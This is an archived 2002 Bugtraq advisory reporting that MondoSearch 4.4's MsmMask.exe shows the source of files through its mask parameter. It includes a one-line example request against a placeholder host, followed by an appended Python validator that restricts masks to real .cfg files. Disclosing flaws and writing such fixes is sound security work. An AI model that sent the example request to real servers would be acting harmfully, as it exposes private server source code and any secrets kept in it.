[27382] in bugtraq
MondoSearch shows the source of all files
daemon@ATHENA.MIT.EDU (thefastkid)
Thu Oct 10 15:09:29 2002
Date: 10 Oct 2002 18:09:35 -0000
Message-ID: <20021010180935.14148.qmail@mail.securityfocus.com>
From: thefastkid <thefastkid@ziplip.com>
To: bugtraq@securityfocus.com
MondoSearch shows the source of all files
--------------------------------------------
Affected Program: MondoSearch 4.4
(possibly earlier versions too, but not tested)
Vendor: http://www.mondosoft.com
Vendor Status: not informed yet
Discovery Date: 10 Oct 2002
Problem
-------
You can see the source of the files that are in the same
directory and subdirectories.
Example
-------
http://www.foo/cgi-bin2/MsmMask.exe?mask=/foo.asp
..to see the source of foo.asp in the root dir
Solutions
---------
* The program has to check whether it is a real .cfg file
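
One way to implement the check the Solutions section asks for, as an added example that is not part of the original post and not MondoSearch code. The function names and the dedicated mask directory (`mask_root`) are assumptions made for illustration, and the directory layout is constructed sample data.

```python
import os
import tempfile

ALLOWED_EXT = ".cfg"  # the post's fix: only real .cfg files may be read


def resolve_mask(mask_param, mask_root):
    """Return the real path of a permitted mask file, or None to refuse.

    mask_root is a hypothetical directory that holds only mask .cfg files.
    """
    if not mask_param or "\x00" in mask_param:
        return None  # empty value or NUL byte used to truncate the name
    # Treat backslashes as separators too, since the CGI runs on Windows.
    rel = mask_param.replace("\\", "/").lstrip("/")
    root = os.path.realpath(mask_root)
    # realpath collapses ".." and follows symlinks before the checks below.
    candidate = os.path.realpath(os.path.join(root, rel))
    if os.path.commonpath([root, candidate]) != root:
        return None  # resolved outside the mask directory
    if not candidate.lower().endswith(ALLOWED_EXT):
        return None  # e.g. foo.asp, the case shown in the post
    if not os.path.isfile(candidate):
        return None  # must be an existing regular file
    return candidate


def build_demo_tree():
    """Constructed sample layout: a web root with foo.asp and a masks/ dir."""
    webroot = tempfile.mkdtemp()
    masks = os.path.join(webroot, "masks")
    os.mkdir(masks)
    for path, body in [
        (os.path.join(webroot, "foo.asp"), "<% ' server-side source %>"),
        (os.path.join(webroot, "other.cfg"), "not a mask file"),
        (os.path.join(masks, "default.cfg"), "mask settings"),
    ]:
        with open(path, "w") as fh:
            fh.write(body)
    return webroot, masks


if __name__ == "__main__":
    _, masks_dir = build_demo_tree()
    for value in ["default.cfg", "/foo.asp", "../foo.asp", "../other.cfg"]:
        print(repr(value), "->", resolve_mask(value, masks_dir))
```

Checking the extension alone would still allow `../other.cfg`, which is why the containment test runs on the resolved path before anything is opened.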